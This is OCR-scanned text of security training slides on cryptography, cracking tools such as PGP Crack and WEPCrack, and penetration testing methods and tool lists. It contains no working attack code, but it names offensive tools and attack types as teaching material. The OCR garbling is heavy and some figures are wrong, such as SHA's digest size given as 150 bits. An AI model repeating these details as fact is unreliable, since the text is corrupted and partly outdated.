© 56 bit l<ey algoritiinns offer good privacy but are 
vulnerable. 

© 64 bit algoritiinns are safe today but wi 1 1 be soon 
threatened as the technology evolves. 

© 128 bit and over algorithms are almost 
unbreakable. 

© 256 bit and above are impossible. 
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B r ute- F orce Attack 



I 



Estimate Time for Successful Brute-Force Attack 



Power / cost 


40 bite 


56 bits 


64 bits 


12a bits 




(5 char) 


(7 char) 


(8 char) 


(16 chars) 


$ 2K (1 PC. Can be achieved by an individual) 


1 A min 


73 days 


50 years 


1C " years 


$ 100 K (This can be achieved by a company) 


2 sec 


35 hours 


1 year 


10^' years 


$ 1 fvl (Achieved ay a huge organization or a 


0.2 sec 


3.5 hours 


37 days 


1C^^ years 
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J 



RSA Attacks 



I 



© Brute forcing RSA factoring 



© Esoteric attacl< 



© Chosen ci pher text attacl< 

© Low encryption exponent attacl< 

© Error analysis 



© Other attacl<s 
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MD5 



I 



© The M D5 algorithm takes, as i nput, a message 
of arbitrary length and outputs a 128- bit 
fingerprint or message digest of the input. 

© The M D5 algorithm is intended for digital 
si gnatu re appi i cati ons where a I arge f i I e must 
be compressed i n a secure manner before bei ng 
encrypted with a private (secret) key under a 
public-key cryptosystem, such as RSA. 
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SHA (Secure Hash Algorithm) 



© The SHA algorithm takes, as input, a message 
of arbitrary length and outputs a 150- bit 
fi ngerpri nt or message digest of the i nput. 

© The algorithm is slightly slower than MD5, but 
the larger message digest makes it more secure 
against brute-forcecollision and inversion 
attacks. 
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SSL (Secure Socket Layer) 



© SSL stands for Secure Sockets Layer, 
SSL is a protocol developed by 
Netscape for transmitting private 
documents via the I nternet. 

© SSL works by usi ng a private key to 
encrypt data that is transferred over the 
SSL connection. 



© SSL Protocol is application protocol 
independent. 
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© RC5 is a fast, symmetric blocl< cipher designed by RSA 
Security in 1994. 

© It is a parameterized algorithm with a variable blocl< 
size, a variable key size, and a variable number of 
rounds. The key size is 128 bits. 

© RC6 is a block cipher based on RC5. Like RC5, RC6 is a 
parameterized algorithm where the block size, the key 
size, and the number of rounds are variable. The upper 
limit on the key size is 2040 bits. 
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© The program SSH (Secure Shell) is a secure 
repi acement for tel net and the Ber kel ey r- uti 11 ti es 
(riogin, rsh, rep, and rdist). 

© It provides an encrypted channel for logging into 
another computer over a network, executing commands 
on a remote computer, and movi ng fi les from one 
computer to another. 

© SSH provides a strong host- to- host and user 
authentication as wel I as secure encrypted 
communications over an insecure I nternet. 

© SSH 2 is a more secure, efficient, and portable version of 
SSH that includes SFTP, an SSH 2 tunneled FTP. 
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Government Access to Keys (GAK) 



I 



© Government Access to Keys (also known as key escrow) 
means that software companies wi 1 1 give copi es of all 
keys (or at least enough of the key that the remai nder 
could be cracked very easily) to the government. 

© The government promises that they would hold the keys 
i n a secure way and only use them to crack keys when a 
court issues a warrant to do so. 

© To the government, this issue is si mi I ar to the abi I ity to 
wiretap phones. 
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RSA Cha lenge 



I 



Challenge Number 


Prize ($US) 


Status 


Submission Date 


Submitter(s) 


RSA-576 


$10,000 


Not Factored 






RSA-640 


$20 ,000 


Not Factored 






RSA-704 


$30,000 


Not Factored 






RSA-768 


$50,000 


Not Factored 






RSA-896 


$75,000 


Not Factored 






RSA- 1024 


$100,000 


Not Factored 






RSA- 1536 


$150,000 


Not Factored 






RSA-2048 
1 1 


$200,000 


Not Factored 







The RSA Factoring challenge is an effort, sponsored by RSA 
Laboratories, to learn about the actual difficulty of factoring 
large numbers of the type used in RSA keys. A set of eight 
challenge numbers, ranging in size from 576 bits to 2048 bits, 
are given. 
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www.distributed.net 

© An attempt to cracl< RC5 encryption using a networl< of 
computers world wide. 

© Tlie client utility, when downloaded from 
distri buted.net, runs the crack algorithm as a 
Screensaver and sends results to the distri buted.net 
connected servers. 

© The challenge is still running. 
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J 



PGP (Pretty Good Privacy) 



© Pretty Good Privacy (PGP) is a software package 
originally developed by Philip R. Zi mmer man n that 
provides cryptographic routines for emails and file 
storage appi cations. 

© Zi mmermann took existi ng cryptosystems and 
cryptographic protocols and developed a program that 
can run on multiple platforms. It provides message 
encryption, digital signatures, data compression, and 
email compatibility. 




BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



L J 



Code Breaking: Methodologies 



© The various methodologies used for code 
breaki ng are as f ol I ows: 

• Using brute force 

• Frequency analysis 

• Tricl<eryand deceit 

• One-time pad 
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Cryptography Attacks 



© Cryptography attacks are based on the 
assumption that thecryptanalyst has knowledge 
of the I nformation encrypted. 

© Cryptography attacks are of seven types: 

• Ciphertext only attack 

• Known- plaintext attack 

• Chosen- plaintext 

• Adaptive chosen- pi ai ntext attack 

• Chosen-ciphertext attack 

• Chosen- key attack 

• Rubber hose attack 
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Disk Encryption 



■ 



©Disk encryption worl<s si mi larly to text message 
encryption. 

© With the use of an encryption program for your 
disl<, you can safeguard any and all information 
to burn onto the disl< and l<eep it from falling 
i nto the wrong hands. 

© Encryption for disks is incredibly useful if and 
when you need to send sensitive information 
through the mail. 
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Hacking Tool: PGP Crack 



http://munitionsjgluxjb.neiydolphin.cgi?ad:ion=render 
&category=0406 

©PGP crack is a program designed to brute- force a 
conventionally encrypted file with PGP or a PGP 
secret key. 

© Thefilepgpfilemust not be ascii- armored. The file 
phraseli St should be a file containing all of the 
passph rases that wi 1 1 be used to attempt to crack the 
encrypted file. 
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Magic Lantern 



© A new surveillance software that 
would al low agents to decode the 
hard-to- break encrypted data of 
criminal suspects. 

© M agic Lantern works by i nfecti ng 
a suspect's computer with a vi rus 
that i nstal Is keyloggi ng software - 
a program that can capture the 
keystrokes typed i nto a computer. 
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WEPCrack 



© WEPCrack is an open source tool for breaking 
802. 11 WE P secret keys. 

© This tool is Perl -based, and is composed of the 
following scripts: 

• WeaklVGen.pl 

• prIsm-getlV.pl 

• WEPCrack.pl 
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Cracki ng S/ M I M E Encryption Using I die 
CPU Time 



© 1 1 tries to brute- force an S/ M I M E encrypted 
emai I message by translati ng an S/ M I M E 
encrypted message to RC2 format, and then 
tryi ng al I the possi ble keys to decrypt the 
message. 

©This brute-force utility comes in two forms: 

• Command line 

• Screen saver 
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CypherCalc 



©It is a full-featured, 
programmabi e cal cu I ator 
designed for multi-precision 
integer arithmetic. 

©It is intended for use in the 
design, testing, and analysis of 
cryptographic algorithms 
i nvol vi ng key exchanges, 
modular exponentiation, 
modular inverses, and 
Montgomery Math. 

©It has built-in GCD and SHA 1 
tools, and a CRC tool that can 
generate CRC tables for your 
applications. 
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Command LineScriptor 



© Automate file encryption/ decryption, digital 
signing, and verification. 

© Send files and emails securely without any user 
intervention. 

© E nsure that al I of the i mportant data is secured 
without relying on user input. 

© Bui k delete f i les at a pre-defi ned date and ti me. 

© I ntegrates cryptographic techniques into the 
exi sti ng appi i cati ons. 

© Processes incoming secure files from any 
Open PGP compliant application. 
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Screenshot of Command Li ne Scri ptor 
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CryptoH eaven 



© CryptoH eaven al I ows groups to send encrypted emai I , 
securely backup and share files, pictures, charts, 
business documents, and any other form of electronic 
media through a secure environment. 

© No third parties, including server administrators, 
government agencies, big brothers, and others watching 
have access to plain text version of the transmitted 
information. 

© Some of the features of the servi ce i ncl ude secure 
document storage, secure document shari ng and 
distribution, secure message boards, secure email, and 
secure i nstant messagi ng. 
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Summary 



© Using Public Key I nfrastructure(PKI ), anyone can send a confidential 
message using public information, which can only be decrypted with a 
private key in the sole possession of the intended recipient. 

© RSA encryption is widely used and is a de-facto encryption standard. 

© The MD5 algorithm is intended for digital signature applications, 
where a large file must be compressecTsecu rely before being 
encrypted. 

© SH A algorithm takes, as input, a message of arbitrary length and 
outputs a 160- bit message digest of the i nput. 

© Secure Sockets Layer, SSL is a protocol for transmitting private 
documents via the I nternet. 

© RC5 is a fast block cipher designed by RSA Security. 

© SSH (Secure Shell) is a secure replacement for telnet and the Berkeley 
r-utilities and this provides an encrypted channel for logging into 
another computer over a network, executi ng commands on a remote 
computer, and movi ng fi les from one computer to another. 
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Introduction to PT 



I 



© M ost hackers fol low a common approach when it comes 
to penetrating a system. 

© I n the context of penetration testi ng, the tester is 
limited by resources, namely time, skilled resources, 
and access to equipment, as outlined in the penetration 
testi ng agreement. 

© A pentest si mul ates methods used by i ntruders to gai n 
unauthorized access to an organization's networked 
systems and then compromise them. 
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Categories of Security Assessments 



© Every organization uses different types of security 
assessments to val i date the I eve! of secu r i ty on i ts 
networl< resources. 

© Security assessment categories are security audits, 
vul nerabi I i ty assessments, and penetrati on testi ng. 

© Each type of security assessment requi res that the 
people conducti ng the assessment have different sl<i lis. 
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Vul nerabi I i ty Assessment 



© This assessment scans a network for known 
security weaknesses. 

© Vulnerability scanning tools search network 
segments for I P-enabled devices and enumerate 
systems, operating systems, and applications. 

© Vul nerabi I ity scanners can test systems and 
network devices for exposure to common 
attacks. 

© Additionally, vul nerabi I ity scanners can identify 
common security configuration mistakes. 
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Li mitations of Vul nerabi I i ty 
Assessment 



© Vulnerabilityscanning software is limited in its 
abi I i ty to detect vu I nerabi I i ti es at a gi ven poi nt 
i n ti me. 

© Vulnerability scanning software must be 
updated when new vulnerabilities are 
discovered or improvements are made to the 
software bei ng used. 

© The methodology used as well as the diverse 
vul nerabi I ity scanni ng software packages assess 
security differently. This can influence the 
result of the assessment. 
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Penetration Testing 



© Penetration testing assesses the security model 
of the organization as a whole. 

© Penetration testing reveals potential 
consequences of a real attacker breaki ng i nto 
the network. 

© A penetration tester is differentiated from an 
attacker only by his intent and lack of malice. 

© Penetration testing that is not completed 
professional ly can result i n the loss of services 
and disruption of business continuity. 
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Types of Penetration Testing 



© External testing 

•This type of testi ng i n vol ves anal ysi s of pu bl i cl y 
aval I able information, a network enumeration phase, 
and the behavior of security devices analyzed. 

© Internal testing 

• Testi ng wi 1 1 typi cal ly be performed from a number of 
network access poi nts, representing each logical and 
physical segment. 

- Bl ack hat testi ng/ zero know! edge testi ng 

- Gray hat testing/ parti a! know! edge testing 

- White hat testi ng/ compi ete know! edge testi ng 
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Risk Management 



© An unannounced test is usually associated with higher 
risk and a greater potential of encountering unexpected 
problems. 

© Risk =Threatx Vulnerability 

© A planned risk is any event that has the potential to 
adversely affect the penetration test. 

© The pentest team is advised to plan for significant risks 
to enable conti ngency plans i n order to effectively 
utilize time and resources. 
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Do- it- Yourself Testi ng 



h 



© The degree to which the testing can be 
automated i s one of the maj or var i abl es that 
affect the sl<i II I evel and ti me needed to run a 
pentest. 

© The degree of test automation, the extra cost of 
acqui ri ng a tool , and the ti me needed to gai n 
prof i ci ency are factors that i nf I uence the test 
period. 
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Outsourcing Penetration Testing 
Ser vi ces 



© Drivers for outsourci ng pentest services 

• To get the network audited by an external agency to 
acqui re an i ntruder's poi nt of view. 

• The organization may require a speiificseiurity 
assessment and suggestive cor relive measures. 

© Underwriting penetration testing 

• Professional liability insurance pays for settlements 
or j udgments for whi ch pentesters become I i abl e as a 
result of their actions, or failure to perform 
professional services. 

• It is also known as E&O insurance or professional 
i ndemnity i nsu ranee 
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Terms of Engagement 



© An organization will sanction a penetration test 
against any of its production systems after it 
agrees upon explicitly stated rules of 
engagement. 

© 1 1 must state the terms of reference under whi ch 
the agency can i nteract with the organization. 

© 1 1 can specify the desi red code of conduct, the 
procedures to be foil owed, and the nature of 
interaction between the testers and the 
organization. 
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Project Scope 



I 



© Deter mi ni ng the scope of the pentest is 
essential to decide if the test is a targeted test or 
a comprehensive test. 

© Comprehensive assessments are coordi nated 
efforts by the pentest agency to uncover as 
much vulnerability as possible throughout the 
organization. 

© A targeted test wi 1 1 seek to identify 
vulnerabilities in specific systems and practices. 
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Pentest Service Level Agreements 



© A service level agreement is a contract that 
detai Is the terms of service that an outsourcer 
will provide. 

© Professionally done SLAs can include both 
remedies and penalties. 

© The bottom I i ne i s that SLAs def i ne the 
mi n i mu m I evel s of aval I abi I i ty from the testers, 
and determi ne what actions will betaken in the 
event of serious disruption. 
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Testing Points 



© Organizations have to reach a consensus on the 
extent of i nformation that can be divulged to 
the testi ng team to determi ne the starti ng poi nt 
of the test. 

© Providing a penetration testing team with 
additional information may give them an 
unrealistic advantage. 

© Similarly, the e)ctent to which the vulnerabilities 
need to be exploiting without disrupting critical 
services need to be determined. 
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Testing Locations 



© The pentest team may have a preference to do 
the test remotely or on-site. 

© A remote assessment may simulate an external 
hacker attack. However, it may miss assessing 
internal guards. 

© An on-site assessment may be expensive and 
not simulate an external threat exactly. 
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Automated Testi ng 



© Automated testing can result in time and cost 
savi ngs over a long term; however, they cannot 
replace an experienced security professional. 

© Tools can have a high learning curve and may 
need frequent updati ng to be effective. 

© With automated testing, there exists no scope 
for any of the architectural elements to be 
tested. 

© As with vulnerability scanners, there can be 
false negatives or worse, false positives. 
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Manual Testing 



© This is the best option an organization can 
choose and benefit from the experience of a 
security professional . 

© The objective of the professional is to assess the 
security posture of the organization from a 
hacker's perspective. 

© A manual approach requires planning, test 
designing, and scheduling, and diligent 
documentation to capture the results of the 
testi ng process i n its enti rety. 
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Using DNS Domain Name and IP 
Address I nformation 



© Data from the DNS servers related to the target 
network can be used to map a target 
organization's network. 

© The DNS record also provides some valuable 
information regarding the OS or applications 
that are bei ng run on the server. 

© The I P block of an organization can be 
discerned by looking up the domain name and 
contact information for personnel. 
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Enumerating I nformation About Hosts 
on Publicly Avail able Networks 



© Enumeration can be done using port scanning 
tools, using I P protocols, and listening to 
TCP/ U DP ports. 

©The testi ng team can then vi sual i ze a detai I ed 
network diagram which can be publicly 
accessed. 

© Additionally, the effort can provide screened 
subnets and a comprehensive list of the types of 
traffic which are all owed in and out of the 
network. 

© Web site crawlers can mi rror enti re sites. 
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Testing Network- Filtering Devices 



I 



© The objective of the pentest team would be to 
ascertai n that al 1 1 egi ti mate traff i c f I ows 
through the filtering device. 

© Proxy servers may be subjected to stress tests to 
determi ne thei r abi I ity to f i Iter out unwanted 
packets. 

© Testing for default installations of the firewall 
can be done to ensure that default user I Ds and 
passwords have been disabled or changed. 

© Testers can also check for any remote log! n 
capability that might have been enabled. 
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Enumerating Devices 



© A devi ce i n ventory is a collection of network 
devices together with some relevant 
information about each device that is recorded 
in a document. 

© After the network has been mapped and the 
business assets identified, the next logical step 
i s to make an i nventory of the devi ces. 

© A physical check may be conducted additionally 
to ensure that the enumerated devices have 
been located correctly. 
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Den i al of Servi ce E mu I ati on 



© Emulating DoS attacks can be resource 
intensive. 

© DoS attacl<s can be emulated using hardware. 

© Some onl i ne sites si mulate DoS attacks for a 
nominal charge. 

© These tests are meant to check the effectiveness 
of anti-dos devices. 
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Pentest U si ng Appscan 
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AppScan is a tool developed for automated 
web application security testing and 
weakness assessment software. 
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Hacker Shi eld 



I 



© Hacker Shield is an anti-hacl<ing program that 
identifies and fixes the vulnerabilities that 
hackers uti lize i nto servers, workstations, and 
other I P devices. 



HackerShield Scan Summary: 10.30.102.39 



Report Name: 


10.30.102.39 Report Date: 


08-07-2000 13:38:24 


No. of Hosts Scanned: 


1 


Scan Started: 


08-07-2000 13:38:24 


No. of Groups Scanned: 


1 


Scan Completed: 


08-07-2000 13:40:53 


Total Unreachable Devices: 




Elapsed Time: 


00:02:29 


AutoFix Enabled: 


No 






Security Holes Found: 












Found Fixed 




Hiqh Risk 




4 




Medium Risi< 




12 




Low Risi( 




20 




Total 




36 




Unique 




36 
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Pentest Usi ng Cerberus I nternet 
Scanner 



© Cerberus I nformation Security used to maintain 
the Cerberus I nternet Scanner (CI S) now 
avai I abl e at (g)stal<e. 

© 1 1 is programmed to assist the admi nistrators to 
fi nd and f ix vul nerabi I ities i n thei r systems. 
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Pentest Usi ng Cybercop Scanner 



© Cybercop Scanner enables the user to identify 
vulnerabilities by conducting more than 830 
vul nerabi I ity checks. 

© 1 1 is more effective as it runs a scan on over IDO 
hosts at the same ti me and also does only 
applicable tests on network devices. 

© It is also useful to administrators for fixing 
problems and security holes. 
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Pentest Using Foundscan Hardware 
Appliances 



© Foundscan tries to identify and locate the 
operati ng systems runni ng on each I i ve host by 
analyzing returned data with an algorithm. 
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Pentest Using Nessus 



© N essus i s a su i tabi e uti I i ty f or servi ce detecti on 
as it has an enhanced service-detecting feature. 
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Pentest Using NetRecon 



© NetRecon is useful in defining common 
intrusion and attacl< scenarios to locate and 
report network holes. 
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Pentest Using SAINT 



© SAI NT monitors every live system on a network 
for TCP and UDP devices 




BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Pentest Usi ng SecureN ET 



© SecureN ET Pro is a fusion of many technologies, 
namely session monitoring, firewall, hijacking, and 
keyword- based intrusion detection. 
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Pentest Using SecureScan 



© SecureScan is a network vulnerability 
assessment tool that determi nes whether 
i nternal networks and f i rewal Is are vul nerable 
to attacks, and recommends corrective action 
for identified vulnerabilities. 
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Pentest Using SATAN, SARA, and 
Security Analyzer 



© Security Auditor's Research Assistant (SARA) is 
a third generation Unix-based security analysis 
tool. 

© SATAN i s consi dered one of the pi oneeri ng 
tools that led to the development of 
vul nerabi I ity assessment tools. 

© Security Analyzer helps in preventing attacks, 
protecting the critical systems, and safeguards 
the information. 
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Pentest Usi ng STAT Analyzer 



© STAT Analyzer isa vulnerability assessment utility 
that integrates state-of-the-art commercial 
network modeling and scanning tools. 
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VigilENT 



© Vi gi I E NT hel ps protect systems by assess! ng pol i cy 
compliance, identifying security vulnerabilities, and 
helps correct exposures before they result in failed 
audits, security breaches, or costly downtime. 
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Webl nspect 




© Webl nspect 
complements 
fi rewallsand 
intrusion 
detecti on systems 
by identifying web 
application 
security holes, 
defects, or bugs 
with a security 
suggestion. 
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Sequence View 



Severity | Count 



I Type 



I Summar>i 



URL 



Q Critical 
^ Critical 
y Cr^ical 
Critical 
^ Critical 



2 Vulneidbilit>i Database Server Error Message 

1 Vulnerability IIS 5.0 Internet Printing Piotocol ISAPI Suffer Overflow 

1 Vdneiabilitii IIS Global Server Variables Disclosure [global.asa.bak] 

1 Vulneiabilitji Backup Fib (cgi. zip) 

1 Vulnejability CVS Coritent Files 



...list... 

htlp://endo.webappsecuiit5i.ccim 
htip: //endo. vtfebappsecuiity . com 
httpi^/endo.webappseouiitii.com 
http:/'i'endo-webappseouiitj(.com 



Alerts System Log 



Scan opened 
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E val uati ng Different Types of Pentest 
Tools 



© The different factors affecti ng the type of tool 
selected include: 

• Cost 

• Platform 

• Ease of use 

• Compatibility 

• Reporting capabilities 
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Asset Audit 



I 



© Typically, an asset audit focuses on what needs 
to be protected in an organization. 

© The audit enables organizations to specify what 
they have and how we! I these assets have been 
protected. 

© The audit can help in assessing the risk posed 
by the threat to the busi ness assets. 
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Fault Tree and Attack Trees 



© Commonly used as a deductive, top-down 
method for eval uati ng a system's events. 

© I nvol ves specify! ng a root event to analyze, 
followed by identifying all the related events (or 
second-tier events) that could have caused the 
root event to occur. 

© An attack tree provides a formal, methodical 
way of descri bi ng who, when, why, how, and 
with what probability an intruder might attack 
a system. 
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GAP Analysis 



© A GAP analysis is used to determine how 
complete a system's security measures are. 

© The purpose of a GAP analysis is to evaluate the 
gaps between an organization's vision (where it 
wants to be) and current position (where it is). 

© I n theareaof security testing, the analysis is 
typical ly accompi ished by estabi ishi ng the 
extent to which the system meets the 
requirements of a specific internal or external 
standard (or checklist). 
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© Once a device inventory has been compiled, the 
next step i n this process is to I ist the different 
security threats. 

© The pentest team can list thedifferent security 
threats that each hardware device and software 
component might face. 

© The possible threats could be determined by 
identifying the specific exploits that could cause 
such threats to occur. 
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Business I mpact of Threat 



© After a device i nventory has been compi led, 
the next step is to list the various security 
threats that each hardware device and 
software component faces. 

© The pentesters need to rate each exploit and 
threat arising out of the exploit to assess the 
busi ness i mpact. 

© A relative severity can then be assigned to 
each threat. 
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© I nternal metrics is the information available 
within the organization that can be used for 
assessing the risk. 

© The metrics may be arrived at differently by 
pentest teams depend! ng on the method 
followed and their experience with the 
organization. 

© Someti mes thi s may be a ti me consumi ng effort 
or the data may be i nsufficient to be statistical ly 
valid. 



Internal Metrics Threat 
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External Metrics Threat 



I 



© External metrics can be derived from data 
col I ected outsi de the organ i zati on . 

© Thi s can be survey reports such as the F Bl / CSI 
yearly security threat report, reports from 
agencies I ike CERT, or hacker activity reports 
from reputed security f i rms I i ke Symantec. 

©This must bedone prior to the test. 
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Calculating Relative Criticality 



■ 



© Once high, medium, and low values have been 
assigned to the probability of an exploit being 
successful , and the i mpact to the busi ness 
should the event occur, it then becomes 
possi bl e to combi ne these val ues i nto a si ngl e 
assessment of the criti cal ity of thi s potenti al 
vulnerability. 
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Test Dependencies 



© F rom the management perspective, it would be 
approvals, agreement on rules of engagement, 
signing a contract for non-disclosure, as well as 
ascertai ni ng the compensation terms. 

© Post testing dependencies would i ncl ude proper 
documentation, preserving logs, and recording 
screen captures. 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 




I 



© Bug tracker server 

• Web Based Bug/ Defect Tracki ng Software 

- ByAvensoft.com. 

- Bug Tracker Server i s a web- based bug/ defect tracki ng software 
that is used by product developers and manufacturers to manage 
product defects. 

• SWB Tracker 

- Bysoftwarewithbrains.com. 

- SWBTracker supports multi-user platforms with concurrent 
licensing. 

• Advanced Defect Tracking Web Edition 

- By http://www.borderwave.com. 

- The software al lows one to track bugs, defects, feature requests, 
and suggestions by version or customer. 
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Disk Replication Tools 



© SnapbackDUP 

• By http://www.hallogram.com. 

• This uti I ity is programmed to create an exact i mage backup of a 
server or Workstation hard-drive. 

© Daffodil Replicator 

• By http://www.daffodildb.com. 

• Daffodi I RepI icator is a tool that enables the user to 
synchronize multiple data sources using a J ava application. 

© I mage MASSter 40021 

• By http://www.ics-iq.com. 

• This tool allows the user to figure out a sol uti on in setting up a 
workstation and operating system roll out methods. 
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DNS Zone Transfer Testi ng Tool s 



© DNS analyzer 

• httpV/www.solarwi nds.net/Tools/ 1 P_Address_ Man 
agement/ DN S%20 Analyzer/ i ndex.html 

• TheDNS Analyzer application is used to display the 
order of the DNS resource records. 

© Spam blacklist 

• http:/ / www.sol arwi nds. net/Tool s/ E mai I |V| gmt 

• DNS blacklists area popular tool used by email 
administrators to help block reception of SPAM into 
thei r mai I systems. 
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Network Audi ti ng Tools 



© eTrustAudit (AUDIT LOG REPOSITORY) 

• By http://ca.com. 

• The system performance is not reduced and undertakes loads 
of network traffic made by other auditi ng products. 

© i Inventory 

• By http://www.iinventory.com. 

• The i I nventory program enables the user to audit a Windows, 
Mac, or Linux operating system for detailed hardware and 
software conf i gu rati on . 

© Centennial Discovery 

• This Discovery program has unique pending LAN Probe 
software, which is able to locate every I P hardware which is 
connected to the network. 
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Trace Route Tools and Services 



I 



© Trel I i an Trace Route 

• By www.tucows.com. 

• Trace route application allows the website 

ad mi nistrator to see how many servers his website is 
passi ng through before it gets i nto the computer, 
i nformi ng the website ad mi nistrator if there are any 
DrobI em- causing servers, and even gives a ping time 
'or each server in the path. 

© I p Tracer 13 Bywww.soft32.com 

• I p Tracer i s an appi i cati on made for tracki ng down 
spammers. 
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© Sniff 'em 

• By-//www.sniff-em.conn/. 

• Sniff'em^'' isacompetitively priced, performance minded 
Windows based Pacl<et sniffer, Networl< analyzer, and Network 
sniffer, a revolutionary new network management tool 
designed from the ground up with ease and functionality in 
mind. 

0 Prom i Scan 

• Bywww.shareup.com. 

• PromiScan has better monitoring capabilities by providing 
nonstop watch to detect immoral programs starting and ending 
without increasing the network load. 
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Denial of Service Emulation Tools 



© F I ameTh rower - By www.antara.net 

• Generates real -world I nternet traffic from a single 
network appi iance, so users can decide the overal I 
site capacity and performance and pinpoint 
weaknesses and potentially fatal bottlenecks. 



© 



© 



Mercury LoadRunner^""- By http://www.mercury.com 

• TheMercuryLoadRunner application is the 
industry-standard performance- testi ng product for 
the system's behav or and performance. 

CI earSight Analyzer - Bywww.spirentcom.com 

• CI earSight Analyzer has manyfeatures including an 
Application Troubleshooting Core that is used to 
troubleshoot applications with visual representations 
of the information. 
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© PORTENT Supreme 

• By www.loadtesting.com. 

• Portent Supreme i s a featured tool for generati ng I arge 
amounts of HTTP, which can be uploaded into the webserve. 

© WebMux 

• By www.redhillnetworks.com/. 

• WebM ux load balancer can share the load among a large 
number of servers making them appear as one large vi rtual 
server. 

© SilkPerformer 

• Bywww.segue.com/. 

• Si IkPerformer enables the user to exactly predict the 
weaknesses in the application and its infrastructure before it is 
deployed, regardless of its size or complexity. 
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System Software Assessment Tool s 



© System Scanner 

• Bywww.iss.net. 

• TheSystem Scanner network security application operates as 
an integrated comoonent of I nternet Security Systenns' security 
managennent platform, assessing host security, monitoring, 
detecti ng, and reporti ng system security weaknesses. 

© I nternet Scanner 

• Bywww.shavlik.com. 

• This utility has a simple, spontaneous i nterf ace that allows the 
user to accurately control whi ch groups are goi ng to be scanned 
and by what principle, when, ana how they are installed. 

© Database Scanner 

• By www.iss.net. 

• The database scanner assesses onl i ne busi ness risks by 

i dentifyi ng security exposures i n I eadi ng database appi i cati ons. 
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Operating System Protection Tools 



© Basti 1 1 e L i n ux www, basti 1 1 e- 1 i n ux. org 

• Bastille Linux is progrannnned to infornn the installing 
adnninistrator about the issues regarding security concerned in 
each of the scri pt's tasks. 

© E ngarde Secure Li nux www.engardel i nux.org 

• Provides greater levels of support. 

• Supports the advanced hardware and sophisticated upgrade 
path. 
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F i ngerpri nti ng Tools 



© ©Stake LC 5: www,atstake.conn 

• ©stake LC5 decreases security risk by assisti ng the 
admi nistrators to identify and fix security holes that 
are due to the use of weak or easi ly deduced 
passwords. 

© Foundstone: www.foundstone.conn 

• Foundstone's ful ly automated approach to 

vul nerabi I i ty remedi ati on enabi es organ izati ons to 
easily track and managethe vulnerability fix process. 
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Port Scanning Tools 



© Superscan 

• By www.foundstone.conn. 

• This uti I ity can scan througli the port at a good speed and it 
also has this enhanced feature to support unlimited IP ranges. 

© Advanced Port Scanner 

• Bywww.pcflank.com. 

• Advanced Port Scanner is a user-friendly port scanner that 
executes mu I ti -threaded for best possible performance. 

© AW Security Port Scanner 

• Bywww.atelierweb.com. 

• Atelier Web Security Port Scanner (AWSPS) is a resourceful 
network diagnostic toolset that adds a new aspect of 
capabi I i ties to the store of network ad mi nistrators and 
information security professionals. 
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Directory and F i I e Access Contro 
Tools 



© Abyss Web Server for Wi ndows 

• Bywww.aprelium.com. 

• The Abyss Web server appi i cati on i s a smal I personal web 
server that can support HTTP/ 11 CGI scripts, partial 
downloads, caching negotiation, and indexing files. 

© GFI LANguard Portable Storage Control 

• Bywww.gfi.com. 

• TheGFI LANguard Portable Storage Control tool allows 
network administrators to have absol ute control over which 
user can access removable drives, floppy disks, and CD drives 
on the local machine. 

© Windows Security Officer 

• Bywww.bigfoot.com. 

• The Windows Security Officer application enables the network 
administrator to protect and totally control access to all the 
systems present i n the LAN . 
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File Share Scan n i ng Tool s 



© I nfiltrator Network Security Scanner 

• By www.network-security-scan.com/ . 

• This application is a network security scanner tliat 
can be used to audit tlie network computers for 
possible vulnerabilities, exploits, and other 
information enumerations. 

© Encrypted FTP 3 

• By www.eftp.org . 

• GFILAN guard = 

www. mestacl/ sol uci ones/ gf i I an . htm 
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Password Directories 



© Passphrase Keeper 2.60 

• By www.passphrasekeeper.conn. 

• Passphrase Keeper enables the user to safely save 
and nnanageall the account infornnation such as user 
names, passwords, PI Ns, and credit card nunnbers. 

© llSProtect 

• By www.iisprotect.conn. 

• llSProtect does the function of authenticating the 
user and safeguarding passwords. 
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© Webmaster Password Generator 

• Bywww.spychecker.com. 

• The Webmaster Password Generator application is a powerful 
and easy to use tool used to create a large list of random 
passwords. 

© I nternet Explorer Password Recovery Master 

• Bywww.rixler.com. 

• I nternet Explorer Password Reveal er is a password recovery 
tool programmed for watchinq and cleaning the password and 
form data stored by I nternet Explorer. 

© Password Recovery Tool box 

• Bywww.rixler.com. 

• I nternet Password Recovery Toolbox can recover passwords 
that fal I i nto any one of these categories: I nternet Explorer 
Passwords, Network and Dial-Up Passwords, and Outlook 
Express Passwords. 
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© Alert Link Runner 

• By www.alertbookmarks.com. 

• Alert Link Runner is an application that checks the validity of 
hyperl i nks on a web page or site and across an enti re 

E nterpri se N etwork. 

© Link Utility 

• Bywww.net-promoter.com. 

• Link Utility is an application which has many functions. This 
includes checking links in the site and keeping the site fit. 

© LinxExplorer 

• Bywww.linxexplorer.com. 

• LinxExplorer is a link verification tool that enables the user to 
find and validate websites and html pages which have broken 



links. 
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Web-testing Based Scripting Tools 



© Svoi.NET PHP Edit 

• By http://phpedit.svoi.net/eng/nnain.pliedit. 

• Svoi.NET PHP Edit is a uti I ity that enables the user to edit, test, and 
debug PH P scripts and HTM L/XM L pages. 

© OptiPerl 

• By www.xarka.com. 

• Opti Perl enables the user to create CGI and console scri pts i n Perl , or 
offline in Windows. 

© Bl uepri nt Software Web Scri pti ng Editor 

• By www.blueprint-software.net. 
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© StackGuard 

• Bywww.immunix.org. 

• 1 1 i s a compi I er that protects the program agai nst stacl< 
smashing attacl<s. 

© FormatGuard 

• Bywww.immunix.org. 

• 1 1 i s desi gned to provi de sol uti ons to the potenti all y I arge 
number of unknown format bugs. 

© RaceGuard 

• Bywww.immunix.org. 

• Race Guard protects agai nst fi le system race conditions. I n race 
conditions the attacker seeks to exploit the time gap between a 
pr i vi I eged program checki ng for the exi stence of a f i I e, and the 
program actual I y writi ng to that f i I e. 
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F i I e E ncrypti on Tool s 



© Maxcrypt 

• Bywww.tvcows.com. 

• M axcrypt is an automated computer encryption which allows 
the user not to worry about security regard i ng the message 
which is being sent. 

© Secure IT 

• Bywww.cypherix.co.uk/secureit2000/. 

• Secure IT is a compression and encryption application that 
offers a 448- bit encryption and has a very high compression 
rate. 

© Steganos 

• By http:// .steganos.com/ ?product=SSS7&language=en. 

• The Steganos I nternet Trace Destructor appi i cati on del etes 150 
work traces and caches cookies. 
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Database Assessment Tool s 



© EMS MySQL Manager 

• By http://ems-hitech.com/ mymanager/ . 

